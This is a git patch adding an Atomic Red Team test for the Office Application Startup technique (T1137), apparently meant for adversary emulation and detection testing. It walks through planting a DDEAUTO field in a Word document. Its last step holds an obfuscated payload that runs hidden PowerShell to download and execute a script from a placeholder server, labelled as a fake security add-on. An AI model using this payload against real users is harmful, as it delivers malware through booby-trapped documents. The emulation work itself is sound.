From d508caaffd74959c76e2f6ae96b90d5671890c7a Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Fri, 25 May 2018 10:50:52 -0400
Subject: [PATCH] T1137

No .. for Casey
Other than the actual ..'s that are in the repo that are legit from Github..
---
 atomics/T1137/T1137.yaml | 39 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 39 insertions(+)
 create mode 100644 atomics/T1137/T1137.yaml

diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml
new file mode 100644
index 00000000..0521f24b
--- /dev/null
+++ b/atomics/T1137/T1137.yaml
@@ -0,0 +1,39 @@
+---
+attack_technique: T1137
+display_name: Office Application Startup
+
+atomic_tests:
+- name: DDEAUTO
+  description: |
+
+    TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
+
+    SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
+
+    Word VBA Macro
+
+    [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
+
+  supported_platforms:
+    - windows
+
+  executor:
+    name: manual
+    steps: |
+      1. Open Word
+
+      2. Insert tab -> Quick Parts -> Field
+
+      3. Choose = (Formula) and click ok.
+
+      4. Once the field is inserted, you should now see "!Unexpected End of Formula"
+
+      5. Right-click the Field, choose "Toggle Field Codes"
+
+      6. Paste in the code from Unicorn or SensePost
+
+      7. Save the Word document.
+
+      9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
+
+      10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"